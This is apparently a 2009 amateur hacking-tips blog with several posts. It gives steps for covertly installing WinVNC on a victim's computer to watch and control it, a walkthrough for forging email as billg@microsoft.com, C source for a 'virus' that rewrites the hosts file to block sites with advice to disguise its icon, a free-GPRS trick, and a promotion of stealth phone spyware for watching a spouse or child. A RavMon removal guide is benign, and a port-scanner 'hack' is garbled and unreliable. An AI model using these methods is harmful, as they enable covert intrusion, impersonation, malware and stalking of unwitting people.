Thursday, June 25, 2009

akash and my pagal .............best song

control another PC

you want really control another pc

u just mail me than :
iam SEND the name of software
but its not free:....................

from : akash...............

b_akash@rocketmail.com

How to hack a pc in your network

from me ........... its true ....... bakash23@gmail.com
akash007@webduniya.com
How to hack a pc in your network

only 2 steps in the victim 'spc & you will watch him & control his
computer without letting anyone knows or recognize what is happening

1st step"

get to the victims computer and download this file
http://www.filefaactory.com/file/0313ba/........... this not origanaly link

unzip it in the c:\
with the password "metacafe"

2 nd step:

from start menu open run and
type "cmd" ok.
it will open the promt command

in the promt command
type "cd ..: and enter untill you
retch "c"\"then type
>winvnc.exe -install

it will tell u in a text message
that its successfully installed then
type
>net start winvnc
to start this service

now u download in ur pc
the vnc viewer to connect with the victim"s pc


www.realvnc.com/product/download.html

Wednesday, June 24, 2009

Remove RavMon.exe virus without any anti-virus(Do it your self)

Removing Ravmon Virus without Anti-Virus is easy, btw I haven’t met any Anti Virus which can remove this virus. They can stop your pc from being infected but once you are infected they wont be able to remove it.
I don’t know the Actual Name of this virus nor its effects

Anyways its very easy to remove it.

You will have to follow just few simple steps.

* check if your Infected.
* Stop currently running virus.
* Delete virus files.
* Remove virus to run from startup.

So here are the following steps explained:

Remember until you delete the virus files please open drives using address bar by typing C:\ D:\ X:\ as the virus is activated if you double click the drive
1. Right click any drive on your computer and see if right click menu shows some invalild characters
like this
Remove RavMon.exe virus without any anti-virus(Do it your self) - www.crack$hack.ws

If yes then you are infected.

2. Press Alt+Ctrl+Del to bring up the task manager (or right click taskbar to run it) there will be a program in processes named “SVCHOST.EXE” there will be few svchost in small case but check one in capital letters, if you see more than one “SVCHOST.EXE” (all caps one) end the one with your username infront of it instead of LOCAL SERVICE, NETWORK SERVICE or SYSTEM(by pressing end process).
3. To delete the virus files you need to show system protected files.
For this goto
My Computer->(Menu) Tools-> Folder Options -> (Tab) View -> uncheck “Hide System protected files” -> press OK
If you are unable to unhide the system files you can use 3rd party softwares to browse drive and delete files, try ACDsee or WinRAR
Now open drive (by typing drive letter in address bar)
Delete these 2 files

[eminimall]

* Autorun.inf
* Ravmon.exe

Also delete those in all drives (not CD(WR) or DVD(WR) drives) (and remember don’t double click else you will have to start over from top) Open Windows folder and delete SVCHOST.EXE, SVCHOST.dll and MDM.EXE
Now restart the explorer.exe process by killing it in taskmanager and runing it again [(winkey + R), type “explorer” and hit enter]
cleaned RavMon.exe virus

Now right click the drive letter and ull see a clean menu congrats virus is removed 4. Now remove it from startup (Optional as files are deleted)
Winkey + R type “msconfig” hit enter
remove ravmon virus from windows startup

Goto startup tab-> (uncheck) MDM -> OK -> Exit without Restart
How to prevent from this virus in feature
just right click any USB drive (that includes iPod) you have plugged into your PC
if they have currpoted menu the drive is Infected.
Access drive by typing Drive letter and Delete files from that drive
Remember you double click the curropted drive you get infected else you are safe.
The End

Fastest Way to Hack into Others System

ll as I already mentioned you can hack any system which is connected to what we call “The INTERNET”. To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked.

Steps: -

1. Download the Software PORT SCANNER from google.
2. Get the IP address of the victim whose port is open.
3. NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet….
4. The IP of victim u found initially into NETLAB .
5. Thats it now you can access his system.

Note : This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don’t try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily.

Vodafone Hack for Free GPRS

I have been asked by many Vodafone Users to post a Method to get a free GPRS for the Vodafone. Nobody wants to pay for what he/she uses. I am also a Nobody so I was also in trying out all the things to get free GPRS for Vodafone users since I am also a Vodafone User. Finally I have got a Full proof way to get free GPRS for all the Vodafone Users. This method has been tested on different mobiles and has been confirmed to be working. Still if anybody faces any problem please contact me and I will try to solve it as quickly as possible.

Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
Homepage: http://live.vodafone.in
User Name: (no need)
Pass: (no need)

Access Point Settings:

Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings:

Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number to:-

Proxy Port: 9401

Send Fake Email – Fake Email Pranks

Most of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain. But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorised access. Also many of the websites offer you to send fake email from their sites where none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. SMTP server is a simple software program which can be installed on your computer in few seconds. SMTP server allows you to send fake email right from your desktop easily and effectively. Download QK SMTP server HERE. This is the SMTP server i am using in my tutorial. Once you download and install the server on your comp then you are all set to send fake email successfully.

PART A: CONFIGURING SMTP SERVER

Once you have installed the QK SMTP server on your comp you must perform the following configuration.

1. Click on “Settings” button on the main screen,the Settings window pops up

2. On Settings window click on “Basic Parameter” tab

3. Set binding IP to “127.0.0.1″

4. Set port to “25″

PART B: SENDING FAKE EMAIL (EMAIL FORGING)

1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored

2. Goto command prompt(Start-Accessories-Command prompt)

3. Type exactly as follows

C:>telnet 127.0.0.1 25

Here 127.0.0.1 is the default IP of every computer.25 is the port number. SO you are connecting to the SMTP server running on your own computer.This step is very importand to send fake email.

NOTE: The IP 127.0.0.1 should not be substituted by any other IP.

Heres the snapshot of what you see after step 3. Click on it to enlarge



4. After typing the telnet command in the command prompt you get entry to the server which displays the following message. The response of a OK SMTP server is given below. Message within Green color is only explanation.

220 Welcome to QK SMTP Server 3
helo hacker (Type helo & any name followed by space)
250 Hello hacker (Server Welcomes You)
mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake email appears to have come from)
250 billg@microsoft.com Address Okay (Server gives a positive response)
rcpt to:admin@gmail.com (Type any valid recipient email address)
250 admin@gmail.com Address Okay (Server gives a positive response)
data (type this command to start input data)
354 Please start mail input
From:Gates
To:admin@gmail.com
Date:Sat Jan 5,2008 9:45 PM
Subject:Test to send fake email
You can create as many headers followed by the “:” symbol.
NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data

End the body of email by pressing [ENTER] .(dot) [ENTER]

250 Mail queued for delivery (Sever indicates that the email is ready for sending)
quit (Type this command to quit from server)
221 Closing connection. Good bye.
Connection to host lost
(You will get the above 2 lines of message after typing “quit” command)
(Your fake email is sent to the recipient)
*****END OF EMAIL FORGING*****
Here’s the screenshot for your convenience




NOTE: THE ABOVE METHOD HAS A VERY LOW SUCCESS RATE. FOR A COMPLETELY WORKING METHOD PLEASE REFER MY NEW POST - How to Send Anonymous Emails – A New Working Way

Send Spam Email to Friends

In this post i will show you how to send spam email to friends.Please use this trick to send spam email only to your friends and that too just for fun.Some times it’s a great fun to play an online prank! Is it not? If you are smart enough and have slightly better computer knowledge than your friends you can really have lots of fun.
Here i’ll show you how to send a fake/anonymous email to your friends.That is you can hide your real name and real email address.You can insert the name and from address of your choice.For example you can send a mail to your friend with the following email address.
From: Bill billg@microsoft.com
Isn’t this amazing.I bet, most of us don’t know that we can send email from other’s name also.Definitely it will be a fun to send an email as Bill Gates (From Microsoft) with the id: billg@microsoft.com. Of course you can use the name and address of your choice.But here i have taken the example of Bill Gates.By using this trick i have fooled many of my friends.So now i am sharing this trick with you.
But one more thing to be remembered! All these emails (fake ones) are considered as spam and are moved to the spam folder incase of Gmail. Bulkbox incase of Yahoo.
But when i tried to send a spam to my own Gmail inbox (just for testing) i was amazed.It directly sent the email to inbox.Here’s i have made a small review of Gmail’s Spam filtering ability.
Do you think Gmail is strong enough in filtering spam? The answer is YES and NO!

YES because Gmail includes a sophisticated spam filter that they are still continuing to improve.It removes spam from the inbox and sends valuable data to the Gmail team working on spam blocking.

NO because it has still got some major bugs that are inefficient to filter even a simple forged email(spam email).I was just trying to send a fake email by experimenting it on my own Gmail account.But i was surprised to see that the fake email was delivered directly to the inbox itself.This time Gmail failed to filter a simple spam.But this is not the case all the time.Some times i have noticed that these kind of fake emails are filtered and moved to the Spam folder.So there lies an uncertainty between under what conditions the filter works efficiently and under what conditions it does’nt.So it’s not possible to completely relay on Gmail for spam filtering and also we cannot ensure that all those mails in the inbox are legitimate.

I have tried this trick on Yahoo but unlike Gmail all the forged emails (fake emails) were perfectly filtered.That does’nt mean that Yahoo is more efficient than Gmail,but these things show the major bugs in Gmail.

Many times we wonder why Gmail & Orkut still carry that 4 letter word “BETA”.But these are some of the reasons for Gmail to be still in testing stage.

Here’s some of the snapshots of my own inbox.Theres a couple of fake messages that appears to have come from Bill Gates . The mail offers me a partnership of 50% in Microsoft Corporation where Gates personally invites me to join his company!!!







I have decided to write a new post with detailed instructions on sending a fake email.
Here’s the step-by-step tutorial on: How To Send Fake Email ?

Creating a Virus to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site.If you are curious about creating such a virus on your own, then you are in the right place.Tody I’ll teach you how to create a simple virus that block’s websites.And as usual I’ll use my favorite programming language ‘C’ to create this website blocking virus.I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’.So, anyone with a basic knowledge of C will be able to understand the working of the virus.This virus need’s to be clicked only once by the victim.Once it is clicked, it’ll block a list of websites that has been specified in the source code.The victim will never be able to surf those websites unless he re-install’s the operating system.This blocking is not just confined to IE or Firefox.So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually.But, here I have created a virus that automates all the steps involved in blocking.The manual blocking process is described in the post How to Block a Website ?

Here is the sourcecode of the virus.

#include
#include
#include

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?

1. Download the source code along with the the compiled module(virus) Here.

2. Compile the sourcecode using any C/C++ compiler.

3. To test, run the compiled module. It will block the sites that is listed in the source code.

4. Once you run the file block_Site.exe, restart your browser program.Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

4. To remove the virus type the following the Run.
%windir%\system32\drivers\etc

5. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1—————————google.com

6. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?

Cell Phone Spy – How to Spy on Cell Phones

Cell Phone SpyAre you curious to know how to spy on cell phones? Do you want to secretly spy on SMS text messages, calls, GPS locations and other confidential info of your child’s or spouse’s cell phone? Well here is a detailed tutorial on how to spy on cell phones.

Every day I get a lot of emails from people asking how to spy on cell phones. Before you can spy on a cell phone you need to know the following facts.

1. To spy on a given cell phone you should make sure that the target cell phone is compatible with the cell phone spy software.

2. It is not possible to install the cell phone spy software on an ordinary cell phone. Cell phone spy softwares are compatible only with the following type of phones (operating systems).

Symbian OS

Apple iphone

Windows Mobile

Today most of the modern phones are loaded with one of the above three softwares and hence compatibility doesn’t pose a major problem. There exists many cell phone spy softwares on the market to accomplish this job and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy softwares and based on the results we conclude that the following cell phone spy software to be the best one.
Mobile Spy



Mobile Spy Features

Mobile Spy is a hybrid software/service which allows you to monitor your cell phone in real time. This unique system records the activities of anyone who uses the compatible iPhone, Windows Mobile or Symbian OS smartphone. You install a small application onto the cell phone. It starts at every boot of the phone but remains stealth and does not show up in the running process list.

Logging Features

1. Calls Log – Each incoming and outgoing number is logged along with duration and time stamp.

2. Every text message is logged even if the phone’s logs are deleted. Includes full text.

3. The device’s current location is frequently logged using GPS when signal is available.

4. Each address entered into Internet Explorer (or any browser) is logged.

5. This cell phone spy software works in total stealth mode. The person using the phone can never come to know about the presence of this software.

How it works

The working of Mobile Spy is very simple and needs no extra knowledge to install and use.

Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a username and password for you online control panel.

Step 2- Install the downloaded cell phone spy software onto any of the compatible cell phone. After installation the software starts recording all the activities on the cell phone.

Step 3- Login to your online control panel to see the logs containing the recorded information.

This is just a small list of it’s features. For a list of compatible phones, installation guide and more details visit the following link
Mobile Spy



Mobile Spy is one of the best and award winning cell phone spy softwares on the market with an affordable price. Mobile Spy team provides an excellent support and hence it becomes just a cakewalk to spy on your favorite cell phone! Today with an excessive usage of cell phones by many teenagers it becomes necessary for their parents to perform cell phone spying. So what are you waiting for? Go grab Mobile Spy and expose the truth.

About Me

My photo
mumbai, mumbai, India
akash....... hacking tips & track plz use only for knowledge plz dont use misuse..........